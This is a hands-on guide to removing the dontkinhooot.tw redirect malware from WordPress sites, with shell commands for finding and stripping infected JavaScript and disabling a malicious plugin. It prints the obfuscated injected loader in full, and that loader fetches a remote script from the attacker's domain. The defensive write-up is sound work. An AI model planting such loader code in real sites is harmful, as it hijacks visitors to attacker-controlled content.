See here how to disable dontkinhooot.tw malware from a WordPress site manually. Use the instructions below to fix your site temporarily. Then proceed to rebuild your site in an updated WordPress instance. This guide won't guarantee there won't be reinfection.
This malware didn't damage the site or stole data. It redirects the visitor to another site, probably to make money from affiliation programs.
I did not identify any injection in database entries, just js
files and a
malicious plugin (php
files).
- The site takes a long time to load.
- Few seconds after loading, the site automatically redirects to another site, completely unrelated.
- In the network tab of the browser, there are lots of calls to wp-admin/new-user.php.
- A call is made to the domain dontkinhooot.tw, which does a 302 redirect to another site.
First of all, make a backup of the WordPress files folder (usually www
or
public_html
in most hosting services), just in case things go wrong:
cp -r www{,-infected}
The malware injects the code below at the begin of all Javascript files (2256 characters). This is what causes the site to get insanely slow.
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
You need to find all infected files and remove the injected stuff. You may use
the script antivi.sh
in this gist for this task (find below). You have to
run it inside the WordPress folder (in most cases www
or public_html
).
antivi.sh
: check how many files are infectedantivi.sh list
: list infected files namesantivi.sh clean
: clean up javascript files - backup your stuff before using it!!!!
Use this script at your own risk.
You need to chose a piece of the malware as footprint (
String.fromCharCode(115,99,114,105,112,116)
in this case) and find all files
that have it.
# list all infected files
grep -R "String.fromCharCode(115,99,114,105,112,116)" * | cut -d: -f1
Once you know the infected files, you can loop through them and remove the first bytes (up to the malware lenght). For some reason, eventhough this malware lenght is 2256, I had to cut 2257 bytes, not sure why.
for file in `grep -R "String.fromCharCode(115,99,114,105,112,116)" * | cut -d: -f1`; do
tail --bytes=+2257 $file > clean.tmp
cat clean.tmp > $file
rm clean.tmp
done
The malware seta a 777
access mode to all files. As a temporary solution,
make all js files read-only (to keep the malware from re-injecting into them)
and remove "write" and "execute" permission to "others":
# make all JS files read-only
for file in `find . -type f -name "*.js"`; do chmod -w $file; done
# remove access to "others"
chmod -R o-rwx *
After removing the piece injected in JS files, the redirection continued to happen.
The malware was also installed as a malicious plugin. There is no script to fix this, you just need to disable the plugin execution. Removing the plugin folder completely may break WordPress execution.
One obfuscation technique used by this malware was concatenating characters using their ASCII code.
A search for ).chr(
, revealed the file
wp-content/plugins/wp-strongs/wp-strongs.php
(you can find it below).
Comment out the call to the start()
function to disable it:
// $wpstrongclass->start();
If you use any caching mechanism in WordPress, disable it, since the cached content may be infected.
Those who saw the infected version of the site will have the infected version of
JS files cached locally. To force visitors to clean their caches, add the
following line to the file index.php
of WordPress' root folder
(the site entry point), right after the <?php
tag.
<?php
header('Clear-Site-Data: "cache", "storage", "executionContexts"');
Some reference links of extended analysis for this malware